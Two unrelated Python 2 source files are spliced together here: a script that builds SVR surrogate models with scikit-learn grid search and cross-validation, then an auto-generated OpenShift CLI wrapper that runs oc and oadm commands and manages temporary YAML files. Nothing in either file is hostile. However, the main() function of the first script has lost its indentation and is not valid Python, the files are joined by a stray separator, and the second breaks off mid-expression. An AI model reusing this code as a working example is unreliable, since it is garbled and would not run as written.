The algorithm trains a surrogate model on the design variables and performance metrics, cross-validates
the model, then returns the SVR object representing the surrogate model that can then be used to
perform sensitivity analysis.
"""
######################################
# CONFIGURATION FILE SELECTION
# Build the absolute path of the directory one level above this file and put
# it on sys.path so the project-level config module can be imported.
thispath = os.path.dirname(os.path.abspath(__file__))
config_relative_path = "/../"
config_abspath = thispath + config_relative_path
sys.path.append(config_abspath)
# Star-import the root config file. The globals used later in this module
# (e.g. input_data_file, features, targets, DEBUG, test_split, gridsearch,
# parallel_jobs, data_title) are presumably defined there -- TODO confirm
# against config.py.
from config import *
# Data normalization flag. This should always be True
normalize = True
output_directory = './SM_outputs/'
######################################
logging.basicConfig(level = logging.DEBUG)
def load_data_from_csv(data_file):
    """
    Unpacks a generic csv of data and returns an array of header field names
    (assumed to be the first row of the csv) and an array of the data fields
    themselves.

    data_file -- path to the csv file to read

    Returns (data_fields, data) where data_fields is a list of stripped
    column names and data is a 2-D numpy array of the numeric rows.
    """
    with open(data_file) as f:
        header = f.readline().split(',')
    data_fields = [name.strip() for name in header]
    # Slice off the first row: genfromtxt parses the text header as NaNs.
    # (The previous single-argument os.path.join(data_file) was a no-op.)
    data = np.genfromtxt(data_file, delimiter=',')[1:]
    return data_fields, data
# Utility function to report best scores
# Gratuitously copied from the scikit-learn example "Comparing randomized search and grid search for
# hyperparameter estimation" at (http://scikit-learn.org/stable/auto_examples/model_selection/randomized_search.html)
def report(grid_scores, n_top=3):
    """Print a short summary of the n_top best cross-validation results.

    Adapted from the scikit-learn example "Comparing randomized search and
    grid search for hyperparameter estimation". Each entry of grid_scores is
    indexable, with the mean validation score at position 1.
    """
    print("\nModel cross-validation report")
    ranked = sorted(grid_scores, key=itemgetter(1), reverse=True)
    for rank, result in enumerate(ranked[:n_top], start=1):
        print("Model with rank: {0}".format(rank))
        print("Mean validation score: %1.4f (std: %1.4f)" % (
            result.mean_validation_score,
            np.std(result.cv_validation_scores)))
        print("Parameters: {0}".format(result.parameters))
        print("")
def generate_optimized_surrogate(X_train, Y_train, label, C_range = [0.1, 5], epsilon_range = 0.01, grid_iter = 10, scoring = 'r2'):
    """
    Trains a surrogate model using Radial Basis Function (RBF) Support Vector Regression (SVR)
    while cross-validating the model and searching the hyperparameter space for optimal values
    of C and epsilon. If a testing (evaluation) data set is provided, it evaluates the best model
    on the testing set.
    This function assumes/requires that the X and Y data inputs be scaled between 0.0 and 1.0.

    X_train       -- training inputs; must expose .values (pandas-style)
    Y_train       -- training targets; must expose .values (pandas-style)
    label         -- name of the target metric, used in plot titles/filenames
    C_range       -- [low, high] bounds of the C search grid
                     (NOTE(review): mutable default argument; harmless here
                     since it is only read, but worth replacing with None)
    epsilon_range -- half-width of the epsilon search grid around std(Y_train)
    grid_iter     -- number of grid points per hyperparameter axis
    scoring       -- sklearn scoring string used to rank candidate models

    Returns the best surrogate model from cross-validation and (if applicable) evaluation.

    NOTE(review): this function uses the pre-0.18 sklearn APIs (grid_search,
    grid_scores_) which were removed in sklearn 0.20, and Python 2 print
    statements; it will not run unmodified on Python 3 / modern sklearn.
    """
    # We're going to roll model training, cross-validation, and hyperparameter optimization
    # all into one function call. First, we need to set up our model to be trained (an SVR object), and
    # create a dictionary containing the range of values to search for optimal hyperparameters.
    # The epsilon grid is centred on the standard deviation of the target values.
    svr = SVR(kernel = 'rbf')
    params = {'C': np.linspace(C_range[0], C_range[1], grid_iter),
            'epsilon' : [np.std(Y_train) + i for i in np.linspace(-epsilon_range, epsilon_range, grid_iter)]}
    # initialize our grid search object. For all intents and purposes, this *will* be our
    # surrogate model because, once we train it, we can make predictions on other data with it.
    # Explanation of parameters:
    #
    # param_grid: the dictionary of parameter settings to use for the gridsearch
    # n_jobs: the number of parallel jobs to run (parallel_jobs is expected to
    #         come from the star-imported config module)
    # scoring: the scoring methodology to use to evaluate and compare models
    # cv: The cross-validation algorithm to use. Passing an integer K instructs the algorithm to
    #     divide the training data into K different folds and cross-validate on each. When K = N where
    #     N is the number of samples in the training data, it is essentially Leave-One-Out crossval.
    #     Here K is set to the sample count, i.e. Leave-One-Out.
    #
    search = grid_search.GridSearchCV(estimator = svr,
                    param_grid = params,
                    n_jobs = parallel_jobs,
                    scoring = scoring,
                    cv = np.shape(Y_train)[0],
                    verbose = 0)
    # run the grid search algorithm to simultaneously train and cross validate our
    # SVR model while searching the hyper parameter spaces for the optimal parameter
    # values.
    start = time()
    print "X_train.values"
    print type(X_train.values)
    print np.shape(X_train.values)
    print "\nY_train.values"
    print type(Y_train.values)
    print np.shape(Y_train.values)
    search.fit(X_train.values, Y_train.values)
    print "GridSearchSearchCV took %1.2f seconds." %((time() - start))
    print "grid_scores_ shape: ", np.shape(search.grid_scores_)
    if DEBUG:
        # let's plot the gridsearch scores across the searched hyperparameter space.
        # first, we get the grid_scores_ array from our gridsearch object and extract
        # the number of hyperparameters we search.
        # NOTE(review): plt and data_name are not defined in this module; they
        # are presumably provided by the star-imported config -- verify,
        # otherwise this DEBUG branch raises NameError.
        scores = search.grid_scores_
        hparameters = params.keys()
        C_hparams = params['C']
        epsilon_hparams = params['epsilon']
        score_dimension = 2
        # create a new array to contain the mesh of scores; each entry is the
        # negated mean validation score (score[1]) of one parameter combo
        score_map = np.empty(np.shape(scores)[0])
        for m, score in enumerate(scores):
            mean = score[1]
            score_map[m] = -mean
        score_map = np.reshape(score_map, (grid_iter, grid_iter))
        # now create the plot
        fig, ax = plt.subplots()
        if score_dimension == 2:
            heatmap = ax.pcolormesh(epsilon_hparams, C_hparams, score_map, cmap = 'viridis')
            ax.set_xlabel(hparameters[0])
            ax.set_ylabel(hparameters[1])
            ax.set_title("%s Hyperparameter score heatmap\n%s" %(label, data_name))
            fig.colorbar(heatmap)
            fig.savefig("%s%s_%s_hyperparameter_heatmap.png" %(output_directory, label, data_name))
        #plt.show()
    report(search.grid_scores_)
    best_model = search.best_estimator_
    print "Best estimator:"
    print best_model
    print "Best parameters: "
    print search.best_params_
    return best_model
def main():
#picklef = open(config_file, 'r')
#config_dict = pickle.load(picklef)
print "\n========================="
print "SURROGATE MODEL GENERATOR"
print "========================="
print "PARSE AND CLEAN DATA"
print "========================="
# load design and target data into a pandas dataframe from the input csv
dataframe = pd.read_csv(input_data_file)
# drop rows (samples) with NaNs in them
dataframe = dataframe[dataframe.isnull() == False]
# split the dataframe into design and target dataframes
design_data = dataframe[features]
design_labels = design_data.axes
target_data = dataframe[targets]
target_labels = target_data.axes
if DEBUG:
print "\nFeatures:\n", design_data
print "\nTargets:\n", target_data
print "\nParsed data shapes\n design data: ", np.shape(design_data), "\n target data: ", np.shape(target_data)
print " #samples: %d\n #input parameters: %d" %(np.shape(design_data)[0], np.shape(design_data)[1])
print " #output parameters: %d" %np.shape(target_data)[1]
if DEBUG:
print "design data:"
print design_data
print "target_data:"
print target_data
if test_split > 0.0:
print "\n========================="
print "SPLIT TRAIN AND TEST DATASETS"
print "========================="
# split the data into a training set and a testing set for validation later.
X_train, X_test, Y_train, Y_test = cross_validation.train_test_split(design_data, target_data, test_size = test_split)
print "\nX_train, Y_train:", np.shape(X_train), np.shape(Y_train)
print "X_test, Y_test:", np.shape(X_test), np.shape(Y_test)
print "training sample size: %d" %np.shape(X_train)[0]
print "testing sample size: %d" %np.shape(X_test)[0]
if DEBUG:
print "X_train:\n", X_train
print "Y_train:\n", Y_train
else:
X_train = design_data
Y_train = target_data
X_test, Y_test = [], []
# standardize the training data to mean 0 and variance 1
if normalize is True:
print "\n========================="
print "DATA NORMALIZATION AND SCALING"
print "========================="
# initialize a StandardScaler object to calculate the means and scaling values of each design
# parameter (that is, it calculates the means and stdevs over the columns).
# We then use the scaler object to transform the entire input data set (except for the design ID
# number) to their normalized values.
X_train_scaler = preprocessing.MinMaxScaler(feature_range=(0,1)).fit(X_train)
X_train_scaled = pd.DataFrame(X_train_scaler.transform(X_train), columns = X_train.axes[1])
if test_split > 0.0:
X_test_scaler = preprocessing.MinMaxScaler(feature_range=(0,1)).fit(X_test)
X_test_scaled = pd.DataFrame(X_test_scaler.transform(X_test), columns = X_test.axes[1])
else:
X_test_scaled = []
print "\n feature min: ", X_train_scaler.data_min_
print " feature max: ", X_train_scaler.data_max_
print " feature range: ", X_train_scaler.data_range_
print " feature scales: \n", X_train_scaler.scale_
print "\nScaled training inputs:"
print " shape: ", np.shape(X_train_scaled)
if DEBUG:
print "\n X_train_scaled:\n", X_train_scaled
print "\nScaled testing inputs:"
print " shape:", np.shape(X_test_scaled)
print "\n X_test_scaled:\n", X_test_scaled
Y_train_scaler = preprocessing.MinMaxScaler(feature_range=(0,1)).fit(Y_train)
Y_train_scaled = pd.DataFrame(Y_train_scaler.transform(Y_train), columns = Y_train.axes[1])
if test_split > 0.0:
Y_test_scaler = preprocessing.MinMaxScaler(feature_range=(0,1)).fit(Y_test)
Y_test_scaled = pd.DataFrame(Y_test_scaler.transform(Y_test), columns = Y_test.axes[1])
else:
Y_test_scaled = []
print "\n output min: ", Y_train_scaler.data_min_
print " output max: ", Y_train_scaler.data_max_
print " output range: ", Y_train_scaler.data_range_
print " output scales: \n", Y_train_scaler.scale_
print "\nScaled training inputs:"
print " shape: ", np.shape(Y_train_scaled)
if DEBUG:
print "\n Y_train_scaled:\n", Y_train_scaled
print "\nScaled testing inputs:"
print " shape:", np.shape(Y_test_scaled)
print "\n Y_test_scaled:\n", Y_test_scaled
#print "\nBefore scaling:"
#print np.shape(X_train)
#print X_train
# This is just for visualizing the normalization transformations with histograms
if DEBUG is True and 1:
fig, axes = plt.subplots(np.shape(X_train)[1], sharex=True, sharey=True)
for ax, label in izip(axes, X_train.axes[1]):
ax.hist(X_train[label], bins = 7)
ax.set_title(label)
fig.suptitle("Distribution of design parameters before normalization")
fig, axes = plt.subplots(np.shape(X_train_scaled)[1], sharex=True,sharey=True)
print X_train_scaled.axes
for ax, label in izip(axes, X_train_scaled.axes[1]):
ax.hist(X_train_scaled[label], bins=7)
ax.set_title(label)
fig.suptitle("Distribution of design parameters after normalization")
if len(Y_train) is not 0 and len(Y_train_scaled) is not 0:
fig, axes = plt.subplots(np.shape(Y_train)[1], sharex=True,sharey=True)
for ax, label in izip(axes, Y_train.axes[1]):
ax.hist(Y_train[label], bins=7)
ax.set_title(label)
fig.suptitle("Distribution of performance parameters before normalization")
fig, axes = plt.subplots(np.shape(Y_train_scaled)[1], sharex=True,sharey=True)
for ax, label in izip(axes, Y_train_scaled.axes[1]):
ax.hist(Y_train_scaled[label], bins=7)
ax.set_title(label)
fig.suptitle("Distribution of performance parameters after normalization")
plt.show()
else:
X_train_scaled = X_train
X_test_scaled = X_test
print "\n========================="
print "SUPPORT VECTOR REGRESSION"
print "========================="
surrogate_models = [] # Array to hold the surrogate model objects for each output parameter
# If gridsearch is True, use scikit-learn's gridsearch to systematically search for optimal
# hyperparameter values. Else, we use hyperparameter values set by the user to construct and
# train surrogate models for each performance variable.
if gridsearch:
# construct a surrogate model for each output parameter (performance metric)
print "My God... They're learning..."
for n, target_parameter in enumerate(Y_train_scaled):
print "\n------------------------"
print target_parameter
print "------------------------"
if DEBUG: print Y_train_scaled[target_parameter]
model = generate_optimized_surrogate(X_train_scaled,
Y_train_scaled[target_parameter],
label = target_parameter,
C_range = C_range,
epsilon_range = epsilon_scale,
grid_iter = optimize_iter,
scoring = model_scoring)
surrogate_models.append(model)
else:
for n, target_parameter in enumerate(Y_train_scaled):
print "\n------------------------"
print target_parameter
print "------------------------"
model = SVR(kernel='rbf', C = C_tuple[n], epsilon = epsilon_tuple[n], gamma = 'auto').fit(X_train_scaled, Y_train_scaled[target_parameter])
surrogate_models.append(model)
print "\nSurrogate models:\n", surrogate_models
"""
print np.shape(surrogate_model)
print surrogate_model
# make predictions over the output surrogate data.
#prediction_outputs = [model.predict(X_train_scaled) for model in surrogate_model]
prediction_outputs = surrogate_model[1].predict(X_train_scaled)
print np.shape(prediction_outputs)
print prediction_outputs
"""
# If the sampled data was split into training and testing sets, evaluate the generated models
# on the testing data. Otherwise, compute cross-validated scores using the training data.
# First, instantiate a list to hold our scaler (transformation) objects to transform the values
# predicted by the models to the range of the performance metrics being modeled.
Y_scalers = []
for n, model in enumerate(surrogate_models):
print "\n------------------------"
print targets[n]
print "------------------------"
if test_split > 0.0:
print "\n========================="
print "MODEL EVALUATION"
print "========================="
predictions = model.predict(X_test_scaled)
target_values = Y_test[targets[n]]
# reverse-transform the outputs and predictions back to their original values
Y_test_scaler = preprocessing.MinMaxScaler().fit(Y_test[targets[n]].reshape(-1,1))
predictions = Y_test_scaler.inverse_transform(predictions.reshape(-1,1))
#print Y_test[:,n]
#print predictions
#result_array = np.column_stack((Y_test[:,n].reshape(-1,1), predictions))
print "test values, predicted values"
print target_values, predictions
print "model score:", metrics.mean_squared_error(target_values, predictions)
#print "model score: ", model.score(target_values, predictions)
print "model parameters:"
parameters = model.get_params()
print ' C: ', parameters['C']
print ' epsilon: ', parameters['epsilon']
#print ' gamma: ', parameters['gamma']
# If a testing set was not set aside, use Leave-One-Out (LOO) cross-validation
else:
scaled_target_values = Y_train_scaled[targets[n]].values
target_values = Y_train[targets[n]].values
scores = cross_validation.cross_val_score(model,
X_train_scaled.values,
scaled_target_values,
scoring = 'mean_squared_error',
cv = len(Y_train_scaled))
avg_score = np.mean(scores)
score_std = np.std(scores)
print "model avg score: %1.5f (+/-%1.5f)" %(-avg_score, score_std)
predictions = cross_validation.cross_val_predict(model,
X_train_scaled.values,
scaled_target_values,
cv = len(Y_train_scaled))
# Make a scaler and inverse transform the predictions back to their original, unscaled ranges
Y_test_scaler = preprocessing.MinMaxScaler().fit(target_values)
predictions = Y_test_scaler.inverse_transform(predictions)
Y_scalers.append(Y_test_scaler)
print "Y_scalers[%d]: "%n, Y_scalers[n]
# plot the predicted vs actual values
fig, ax = plt.subplots()
ax.scatter(predictions, target_values, marker = 'x')
ax.plot(target_values, target_values, c='b', linestyle='--')
ax.set_xlabel("Predicted Values")
ax.set_ylabel("Actual Values")
ax.set_title("Predicted vs Actual Target Values: %s" %targets[n])
fig.savefig('%s%s_%s_predicted_vs_actual.png' %(output_directory, data_title, targets[n]))
"""
if test_split > 0.0:
print "\n========================="
print "MODEL EVALUATION"
print "========================="
# step through each model and evaluate its performance on the testing data
for n, model in enumerate(surrogate_models):
print "\n------------------------"
print targets[n]
print "------------------------"
predictions = model.predict(X_test_scaled)
target_values = Y_test[targets[n]]
# reverse-transform the outputs and predictions back to their original values
Y_test_scaler = preprocessing.MinMaxScaler().fit(Y_test[targets[n]].reshape(-1,1))
predictions = Y_test_scaler.inverse_transform(predictions.reshape(-1,1))
#print Y_test[:,n]
#print predictions
#result_array = np.column_stack((Y_test[:,n].reshape(-1,1), predictions))
print "test values, predicted values"
print target_values, predictions
print "model score:", metrics.mean_squared_error(target_values, predictions)
#print "model score: ", model.score(target_values, predictions)
print "model parameters:"
parameters = model.get_params()
print ' C: ', parameters['C']
print ' epsilon: ', parameters['epsilon']
#print ' gamma: ', parameters['gamma']
# plot the predicted vs actual values
fig, ax = plt.subplots()
ax.scatter(predictions, target_values, marker = 'x')
ax.plot(target_values, target_values, c='b', linestyle='--')
ax.set_xlabel("Predicted Values")
ax.set_ylabel("Actual Values")
ax.set_title("Predicted vs Actual Target Values: %s" %targets[n])
fig.savefig('%s%s_predicted_vs_actual.png' %(output_directory, targets[n]))
else:
print "\n========================="
print "MODEL CROSS-VALIDATION"
print "========================="
# Use cross-validation to evaluate the models created above
for n, model in enumerate(surrogate_models):
print "\n------------------------"
print targets[n]
print "------------------------"
scaled_target_values = Y_train_scaled[targets[n]].values
target_values = Y_train[targets[n]].values
scores = cross_validation.cross_val_score(model,
X_train_scaled.values,
scaled_target_values,
scoring = 'mean_squared_error',
cv = len(Y_train_scaled))
avg_score = np.mean(scores)
score_std = np.std(scores)
print "model avg score: %1.5f (+/-%1.5f)" %(-avg_score, score_std)
predictions = cross_validation.cross_val_predict(model,
X_train_scaled.values,
scaled_target_values,
cv = len(Y_train_scaled))
# Make a scaler and inverse transform the predictions back to their original, unscaled ranges
Y_test_scaler = preprocessing.MinMaxScaler().fit(target_values)
predictions = Y_test_scaler.inverse_transform(predictions)
# plot the predicted vs actual values
fig, ax = plt.subplots()
ax.scatter(predictions, target_values, marker = 'x')
ax.plot(target_values, target_values, c='b', linestyle='--')
ax.set_xlabel("Predicted Values")
ax.set_ylabel("Actual Values")
ax.set_title("Predicted vs Actual Target Values: %s" %targets[n])
fig.savefig('%s%s_predicted_vs_actual.png' %(output_directory, targets[n]))
"""
if save_models is True:
model_file = data_title + "_surrogate_models.pkl"
input_scaler_file = data_title + "_input_scalers.pkl"
scaler_file = data_title + "_datascalers.pkl"
models_savefile = output_directory + model_file
input_scalers_savefile = output_directory + input_scaler_file
scalers_savefile = output_directory + scaler_file
#models_savefile = "%s%s_surrogate_models.pkl" %(output_directory, data_name)
#scalers_savefile = "%s%s_datascalers.pkl" %(output_directory, data_name)
with open(models_savefile, 'w') as f:
pickle.dump(surrogate_models, f)
with open(input_scalers_savefile, 'w') as f:
pickle.dump(X_train_scaler, f)
with open(scalers_savefile, 'w') as f:
pickle.dump(Y_scalers, f)
return surrogate_models, Y_scalers
if __name__ == "__main__":
    # Deferred import: plotting is only needed when the file runs as a script.
    import matplotlib.pyplot as plt
    # Wall-clock timing around the whole run (Python 2 print statement below).
    start = time()
    main()
    print "\nSurrogate Modeling script took %2.2f seconds" %(time()-start)
| |
#!/usr/bin/env python # pylint: disable=too-many-lines
# ___ ___ _ _ ___ ___ _ _____ ___ ___
# / __| __| \| | __| _ \ /_\_ _| __| \
# | (_ | _|| .` | _|| / / _ \| | | _|| |) |
# \___|___|_|\_|___|_|_\/_/_\_\_|_|___|___/_ _____
# | \ / _ \ | \| |/ _ \_ _| | __| \_ _|_ _|
# | |) | (_) | | .` | (_) || | | _|| |) | | | |
# |___/ \___/ |_|\_|\___/ |_| |___|___/___| |_|
'''
OpenShiftCLI class that wraps the oc commands in a subprocess
'''
# pylint: disable=too-many-lines
import atexit
import json
import os
import re
import shutil
import subprocess
import ruamel.yaml as yaml
#import yaml
#
## This is here because of a bug that causes yaml
## to incorrectly handle timezone info on timestamps
#def timestamp_constructor(_, node):
# '''return timestamps as strings'''
# return str(node.value)
#yaml.add_constructor(u'tag:yaml.org,2002:timestamp', timestamp_constructor)
class OpenShiftCLIError(Exception):
    '''Raised when an openshiftcli wrapper operation fails.'''
# pylint: disable=too-few-public-methods
class OpenShiftCLI(object):
    ''' Thin wrapper around the `oc`/`oadm` command-line tools.

    Every helper builds an argument list and shells out through
    openshift_cmd(); temp files written under /tmp are removed at
    interpreter exit via atexit + Utils.cleanup.
    '''
    def __init__(self,
                 namespace,
                 kubeconfig='/etc/origin/master/admin.kubeconfig',
                 verbose=False,
                 all_namespaces=False):
        ''' Constructor for OpenshiftCLI.

        namespace      -- default namespace passed to oc via -n
        kubeconfig     -- path exported as KUBECONFIG to subprocesses
        verbose        -- when True, echo each command and its output
        all_namespaces -- when True, _get() queries --all-namespaces
        '''
        self.namespace = namespace
        self.verbose = verbose
        self.kubeconfig = kubeconfig
        self.all_namespaces = all_namespaces
    # Pylint allows only 5 arguments to be passed.
    # pylint: disable=too-many-arguments
    def _replace_content(self, resource, rname, content, force=False, sep='.'):
        ''' replace the current object with the content; no-op when no key changed '''
        res = self._get(resource, rname)
        if not res['results']:
            return res
        fname = '/tmp/%s' % rname
        yed = Yedit(fname, res['results'][0], separator=sep)
        changes = []
        for key, value in content.items():
            changes.append(yed.put(key, value))
        # yed.put() returns (changed, dict); only replace when at least
        # one key actually changed on the fetched object.
        if any([change[0] for change in changes]):
            yed.write()
            atexit.register(Utils.cleanup, [fname])
            return self._replace(fname, force)
        return {'returncode': 0, 'updated': False}
    def _replace(self, fname, force=False):
        '''run `oc replace -f <fname>` in this namespace '''
        cmd = ['-n', self.namespace, 'replace', '-f', fname]
        if force:
            cmd.append('--force')
        return self.openshift_cmd(cmd)
    def _create_from_content(self, rname, content):
        '''write content to a temp file and `oc create` it '''
        fname = '/tmp/%s' % rname
        yed = Yedit(fname, content=content)
        yed.write()
        atexit.register(Utils.cleanup, [fname])
        return self._create(fname)
    def _create(self, fname):
        '''run `oc create -f <fname>` in this namespace '''
        return self.openshift_cmd(['create', '-f', fname, '-n', self.namespace])
    def _delete(self, resource, rname, selector=None):
        '''run `oc delete` for the named resource '''
        cmd = ['delete', resource, rname, '-n', self.namespace]
        if selector:
            cmd.append('--selector=%s' % selector)
        return self.openshift_cmd(cmd)
    def _process(self, template_name, create=False, params=None, template_data=None):
        '''process a template, optionally creating the rendered objects '''
        cmd = ['process', '-n', self.namespace]
        if template_data:
            # template body supplied inline: feed it to oc on stdin
            cmd.extend(['-f', '-'])
        else:
            cmd.append(template_name)
        if params:
            param_str = ["%s=%s" % (key, value) for key, value in params.items()]
            cmd.append('-v')
            cmd.extend(param_str)
        results = self.openshift_cmd(cmd, output=True, input_data=template_data)
        if results['returncode'] != 0 or not create:
            return results
        # create requested: persist the processed output and create it
        fname = '/tmp/%s' % template_name
        yed = Yedit(fname, results['results'])
        yed.write()
        atexit.register(Utils.cleanup, [fname])
        return self.openshift_cmd(['-n', self.namespace, 'create', '-f', fname])
    def _get(self, resource, rname=None, selector=None):
        '''return a resource by name '''
        cmd = ['get', resource]
        if selector:
            cmd.append('--selector=%s' % selector)
        if self.all_namespaces:
            cmd.extend(['--all-namespaces'])
        elif self.namespace:
            cmd.extend(['-n', self.namespace])
        cmd.extend(['-o', 'json'])
        if rname:
            cmd.append(rname)
        rval = self.openshift_cmd(cmd, output=True)
        # Ensure results are returned in an array
        if rval.has_key('items'):
            rval['results'] = rval['items']
        elif not isinstance(rval['results'], list):
            rval['results'] = [rval['results']]
        return rval
    def _schedulable(self, node=None, selector=None, schedulable=True):
        ''' perform oadm manage-node --schedulable '''
        cmd = ['manage-node']
        if node:
            cmd.extend(node)
        else:
            cmd.append('--selector=%s' % selector)
        cmd.append('--schedulable=%s' % schedulable)
        return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')
    def _list_pods(self, node=None, selector=None, pod_selector=None):
        ''' perform oadm manage-node --list-pods '''
        cmd = ['manage-node']
        if node:
            cmd.extend(node)
        else:
            cmd.append('--selector=%s' % selector)
        if pod_selector:
            cmd.append('--pod-selector=%s' % pod_selector)
        cmd.extend(['--list-pods', '-o', 'json'])
        return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')
    #pylint: disable=too-many-arguments
    def _evacuate(self, node=None, selector=None, pod_selector=None, dry_run=False, grace_period=None, force=False):
        ''' perform oadm manage-node --evacuate '''
        cmd = ['manage-node']
        if node:
            cmd.extend(node)
        else:
            cmd.append('--selector=%s' % selector)
        if dry_run:
            cmd.append('--dry-run')
        if pod_selector:
            cmd.append('--pod-selector=%s' % pod_selector)
        if grace_period:
            cmd.append('--grace-period=%s' % int(grace_period))
        if force:
            cmd.append('--force')
        cmd.append('--evacuate')
        return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')
    def _import_image(self, url=None, name=None, tag=None):
        ''' perform image import (oc import-image --confirm) '''
        cmd = ['import-image']
        image = '{0}'.format(name)
        if tag:
            image += ':{0}'.format(tag)
        cmd.append(image)
        if url:
            cmd.append('--from={0}/{1}'.format(url, image))
        cmd.append('-n{0}'.format(self.namespace))
        cmd.append('--confirm')
        return self.openshift_cmd(cmd)
    #pylint: disable=too-many-arguments
    def openshift_cmd(self, cmd, oadm=False, output=False, output_type='json', input_data=None):
        '''Base command for oc.

        cmd         -- argument list appended after the oc/oadm binary
        oadm        -- use /usr/bin/oadm instead of /usr/bin/oc
        output      -- capture stdout into rval['results']
        output_type -- 'json' (parsed) or 'raw' (string)
        input_data  -- string piped to the process's stdin

        Returns a dict with returncode/results/cmd; stderr/stdout are
        added on failure or JSON-decode error.
        '''
        cmds = []
        if oadm:
            cmds = ['/usr/bin/oadm']
        else:
            cmds = ['/usr/bin/oc']
        cmds.extend(cmd)
        rval = {}
        results = ''
        err = None
        if self.verbose:
            print ' '.join(cmds)
        # KUBECONFIG is the only env var passed to the child process.
        proc = subprocess.Popen(cmds,
                                stdin=subprocess.PIPE,
                                stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE,
                                env={'KUBECONFIG': self.kubeconfig})
        stdout, stderr = proc.communicate(input_data)
        rval = {"returncode": proc.returncode,
                "results": results,
                "cmd": ' '.join(cmds),
               }
        if proc.returncode == 0:
            if output:
                if output_type == 'json':
                    try:
                        rval['results'] = json.loads(stdout)
                    except ValueError as err:
                        # tolerate empty/non-JSON stdout; anything else
                        # propagates via the err branch below
                        if "No JSON object could be decoded" in err.message:
                            err = err.message
                elif output_type == 'raw':
                    rval['results'] = stdout
            if self.verbose:
                print stdout
                print stderr
            if err:
                rval.update({"err": err,
                             "stderr": stderr,
                             "stdout": stdout,
                             "cmd": cmds
                            })
        else:
            rval.update({"stderr": stderr,
                         "stdout": stdout,
                         "results": {},
                        })
        return rval
class Utils(object):
    ''' utilities for openshiftcli modules '''
    @staticmethod
    def create_file(rname, data, ftype='yaml'):
        ''' create a file in /tmp with the given name and contents;
        serializes data as yaml (default), json, or writes it verbatim '''
        path = os.path.join('/tmp', rname)
        with open(path, 'w') as fds:
            if ftype == 'yaml':
                fds.write(yaml.dump(data, Dumper=yaml.RoundTripDumper))
            elif ftype == 'json':
                fds.write(json.dumps(data))
            else:
                fds.write(data)
        # Register cleanup when module is done
        atexit.register(Utils.cleanup, [path])
        return path
    @staticmethod
    def create_files_from_contents(content, content_type=None):
        '''Turn an array of dicts {'path': ..., 'data': ...} into a files
        array of {'name': basename, 'path': tmp path}'''
        if not isinstance(content, list):
            content = [content]
        files = []
        for item in content:
            path = Utils.create_file(item['path'], item['data'], ftype=content_type)
            files.append({'name': os.path.basename(path), 'path': path})
        return files
    @staticmethod
    def cleanup(files):
        '''Clean up on exit: remove each listed file or directory tree '''
        for sfile in files:
            if os.path.exists(sfile):
                if os.path.isdir(sfile):
                    shutil.rmtree(sfile)
                elif os.path.isfile(sfile):
                    os.remove(sfile)
    @staticmethod
    def exists(results, _name):
        ''' Check to see if the results include the name '''
        if not results:
            return False
        if Utils.find_result(results, _name):
            return True
        return False
    @staticmethod
    def find_result(results, _name):
        ''' Find the specified result by metadata.name; None when absent '''
        rval = None
        for result in results:
            if result.has_key('metadata') and result['metadata']['name'] == _name:
                rval = result
                break
        return rval
    @staticmethod
    def get_resource_file(sfile, sfile_type='yaml'):
        ''' read a resource file and parse it as yaml (default) or json '''
        contents = None
        with open(sfile) as sfd:
            contents = sfd.read()
        if sfile_type == 'yaml':
            contents = yaml.load(contents, yaml.RoundTripLoader)
        elif sfile_type == 'json':
            contents = json.loads(contents)
        return contents
    # Disabling too-many-branches. This is a yaml dictionary comparison function
    # pylint: disable=too-many-branches,too-many-return-statements,too-many-statements
    @staticmethod
    def check_def_equal(user_def, result_def, skip_keys=None, debug=False):
        ''' Given a user defined definition, compare it with the results
        given back by our query.  Recurses through nested dicts and lists;
        returns True when equal ignoring the skipped keys. '''
        # Currently these values are autogenerated and we do not need to check them
        skip = ['metadata', 'status']
        if skip_keys:
            skip.extend(skip_keys)
        for key, value in result_def.items():
            if key in skip:
                continue
            # Both are lists
            if isinstance(value, list):
                if not user_def.has_key(key):
                    if debug:
                        print 'User data does not have key [%s]' % key
                        print 'User data: %s' % user_def
                    return False
                if not isinstance(user_def[key], list):
                    if debug:
                        print 'user_def[key] is not a list key=[%s] user_def[key]=%s' % (key, user_def[key])
                    return False
                if len(user_def[key]) != len(value):
                    if debug:
                        print "List lengths are not equal."
                        print "key=[%s]: user_def[%s] != value[%s]" % (key, len(user_def[key]), len(value))
                        print "user_def: %s" % user_def[key]
                        print "value: %s" % value
                    return False
                # compare list members pairwise; dict members recurse
                for values in zip(user_def[key], value):
                    if isinstance(values[0], dict) and isinstance(values[1], dict):
                        if debug:
                            print 'sending list - list'
                            print type(values[0])
                            print type(values[1])
                        result = Utils.check_def_equal(values[0], values[1], skip_keys=skip_keys, debug=debug)
                        if not result:
                            print 'list compare returned false'
                            return False
                    elif value != user_def[key]:
                        if debug:
                            print 'value should be identical'
                            print value
                            print user_def[key]
                        return False
            # recurse on a dictionary
            elif isinstance(value, dict):
                if not user_def.has_key(key):
                    if debug:
                        print "user_def does not have key [%s]" % key
                    return False
                if not isinstance(user_def[key], dict):
                    if debug:
                        print "dict returned false: not instance of dict"
                    return False
                # before passing ensure keys match
                api_values = set(value.keys()) - set(skip)
                user_values = set(user_def[key].keys()) - set(skip)
                if api_values != user_values:
                    if debug:
                        print "keys are not equal in dict"
                        print api_values
                        print user_values
                    return False
                result = Utils.check_def_equal(user_def[key], value, skip_keys=skip_keys, debug=debug)
                if not result:
                    if debug:
                        print "dict returned false"
                        print result
                    return False
            # Verify each key, value pair is the same
            else:
                if not user_def.has_key(key) or value != user_def[key]:
                    if debug:
                        print "value not equal; user_def does not have key"
                        print key
                        print value
                        if user_def.has_key(key):
                            print user_def[key]
                    return False
        if debug:
            print 'returning true'
        return True
class OpenShiftCLIConfig(object):
    '''Generic container for a named resource's CLI options.'''
    def __init__(self, rname, namespace, kubeconfig, options):
        '''Store the resource name, namespace, kubeconfig path and options.'''
        self.name = rname
        self.namespace = namespace
        self.kubeconfig = kubeconfig
        self._options = options
    @property
    def config_options(self):
        '''Expose the raw option dictionary.'''
        return self._options
    def to_option_list(self):
        '''Alias for stringify(), kept for API compatibility.'''
        return self.stringify()
    def stringify(self):
        '''Render the option hash as a list of --key=value CLI params.

        An option is included when its 'include' flag is set and its
        'value' is truthy or an int (so 0/False integers still emit).
        '''
        return ['--%s=%s' % (name.replace('_', '-'), opt['value'])
                for name, opt in self.config_options.items()
                if opt['include']
